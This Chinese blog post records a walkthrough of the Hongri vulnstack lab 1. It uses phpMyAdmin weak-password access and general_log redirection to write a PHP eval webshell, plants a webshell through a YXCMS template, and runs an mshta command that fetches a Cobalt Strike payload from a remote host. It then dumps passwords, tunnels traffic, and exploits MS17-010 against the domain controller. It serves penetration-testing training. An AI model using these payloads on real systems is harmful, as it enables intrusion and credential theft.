红日安全靶场(一)学习笔记

最新推荐文章于 2024-06-04 12:50:14 发布
最新推荐文章于 2024-06-04 12:50:14 发布
阅读量2.1k 收藏 4
点赞数
分类专栏: 笔记 文章标签: 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45244158/article/details/127000062
版权

文章目录

一、环境配置

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
网络拓扑:
image.png
在这里插入图片描述

备注:
1.靶场虚拟机密码为hongrisec@2019,登录时密码可能会过期,修改密码后重新登录即可。
2.web搭建需要自行到C:\phpStudy目录中启动phpStudy。第一次启动phpStudy会报错无法启动,重启一次系统后即可正常运行。

二、外网打点

使用nmap进行端口扫描
image.png

思路1

访问80端口,存在phpstudy探针,可获得网站绝对路径。
C:/phpStudy/WWW
image.png
目录扫描发现phpmyadmin,尝试弱口令root/root登录
image.png

成功使用弱口令进入phpmyadmin管理端
image.png
查看是否有导入权限,有导入权限可直接写入木马。查询结果secure_auth为OFF,没有导入权限。

#查看数据库是否有导入权限
SHOW GLOBAL VARIABLES LIKE '%secure%';

image.png
可通过将一句话木马写入到日志文件内getshell

#查看是否有开启日志记录
SHOW GLOBAL VARIABLES LIKE  '%general%';

image.png
查询到general_log为OFF,日志记录功能关闭,但是我们可以手动开启日志功能

#开启日志并更改日志文件
SET GLOBAL general_log = ON;
SET GLOBAL general_log_file = 'C:/phpstudy/WWW/shell.php';

#查询当前日志状态
SHOW GLOBAL VARIABLES LIKE  '%general%';

image.png

# 往日志里面写入PHP一句话
select '<?php @eval($_POST[cmd]);?>';

image.png

成功getshell
image.png

思路2

存在YXCMS,网站公告给出了默认后台地址和账号密码,尝试登录。
image.png
image.png
点击前台模板管理-管理模板文件
image.png
新增一个模板,内容写入一句话木马
image.png
shell的路径为:http://192.168.30.128/yxcms/protected/apps/default/view/default/shell.php
成功getshell。
image.png

三、横向移动

1.内网信息收集

上线CS
使用脚本生成木马
image.png

上线命令:mshta http://xx.xx.xx.xx:80/java
image.png
抓取明文密码
image.png
fscan内网探测,发现内网两台主机存在MS17-010漏洞,其中一台是域控
image.png

2.隧道搭建

使用CS自带的隧道功能搭建隧道(也可使用其他的隧道工具)
image.png
kali里面修改代理配置文件,配置你的代理服务器
vi /etc/proxychains4.conf
image.png
让msf的流量通过代理
proxychains msfconsole
image.png

3.MS17-010获取域成员权限-192.168.52.141

image.png
image.png

4.MS17-010获取域控权限-192.168.52.138

image.png
image.png
image.png

culprits
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
红日靶场系列一
weixin_54626591的博客
01-22 184
红日靶场系列一
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 8184
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1:192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1:192.168.52.141 Windows Server 2008 R2 x64 VMnet1:192.168.52.138 kali V
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
红日靶场1(渗透记录)
b1n的博客
09-12 1257
分享的靶机实战环境,这篇博客是为自己记录的同时分享出来让大佬们共同检阅,如有问题,还请多多指教。
红日靶场渗透测试——红日靶场1(详细笔记
qq_52849046的博客
05-24 4213
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
红日靶场第一关
红队是青春
11-16 7055
红日靶场第一关 一、环境配置 NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163 二、目标 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
红日靶场(一)
qq_58091216的博客
05-01 3083
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
红日靶场环境搭建详细步骤
hacker3062的博客
09-01 1916
1、下载好镜像文件。2、直接vmware启动即可。这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131)设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130)设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141)这样win10就可以访问win7,但不能直接访问win08和win2k3。三台靶机的初始密码都是hongrisec@2019 ,初次登录需要
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1443
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
红日靶场1
woshicainiao666的博客
01-13 1527
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
[红日安全]AI安全Day1-机器学习算法在web安全中的应用1
08-08
红日安全】AI安全Day1-机器学习算法在web安全中的应用1 在Web安全领域,机器学习已经成为一种强大的工具,用于识别和防御各种威胁,如恶意软件、网络钓鱼、DDoS攻击等。本文将深入探讨机器学习的基础概念及其在...
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
红日AI安全-基于机器学习的攻击检测系统1
08-04
红日AI安全-基于机器学习的攻击检测系统1】主要关注的是如何运用机器学习技术来构建一个能够检测多种攻击类型的系统,特别是SQL注入和一般网络攻击。该系统的实现涉及了特征提取、数据集构建、多种机器学习算法的...
红日Web安全新手入门专刊.pdf
08-08
目录 1 web 安全新手入门指南 2 安全靶场实例分析
ATT&CK 红日1靶机渗透攻略
weixin_47311099的博客
01-27 1930
环境 此实战靶场共 3 台主机,Win7 作为 Web 服务器,是打入此实战靶场的第一个目标和 入手点,Win2K3 为内网域成员主机,WinSever 2008 R2 为内网域控主机。 下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境调试 网卡桥接 主机 网卡 IP win7(web服务器) 1.VM2 2.NAT 192.168.52.143 and 192.168.8.142 win2003(内网域成员)
【内网攻防实战】红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)
最新发布
weixin_46022776的博客
06-04 3008
问题:解决:日志功能未开启,OFF,执行sql开启ON。
内网域渗透总结——红日靶场①_红日靶机账号密码
2401_83621784的博客
04-12 401
​。
红日靶场下载csdn
08-13
红日靶场是一个很受欢迎的网络安全实验平台,用于学习和锻炼网络攻防技术。由于该平台所提供的安全实验环境包含了许多常见的漏洞和攻击场景,因此在安全爱好者和专业人士中间都非常受欢迎。 要下载红日靶场,首先...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值